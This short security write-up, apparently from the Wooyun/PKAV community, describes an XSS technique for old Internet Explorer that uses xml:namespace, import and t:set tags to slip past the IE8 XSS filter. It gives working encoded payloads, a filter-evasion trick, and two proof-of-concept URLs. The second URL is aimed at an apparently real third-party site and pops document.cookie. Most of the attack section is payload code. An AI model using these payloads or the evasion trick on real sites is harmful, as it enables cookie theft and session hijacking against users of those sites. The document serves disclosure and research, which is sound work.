Note: IE 10 have fixed this issue,and IE8 ...
-------------------------------------------------
1. a <?import ... > tag can also be written as a <import ...> tag.
<html> <body> <div> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>"> </div> </body> </html>
the code above will execute script fragment in "to" attribute.
Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set ...>) can bypass the IE8 xss filter.
------------------------------------------------
POC1: use <import ...>
http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>
while using <?import ...> will trigger the xss filter to intercept our code.
2. Our code should start with ">, when we encounter the case like : <input type="text" value="{parameter under controlled}">. The "> will trigger the xss filter, and it will replace some words like 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa)(@Sogili in Wooyun.org) gave me a trick to solve the problem: "x> (x represents any letter) cannot trigger the filter.
-------------------------------------------------
POC2:
http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>
That's all. Thanks for help from my friend jackmasa (@Sogili in Wooyun.org).
Author: Gainover
Group: PKAV .net & Wooyun.org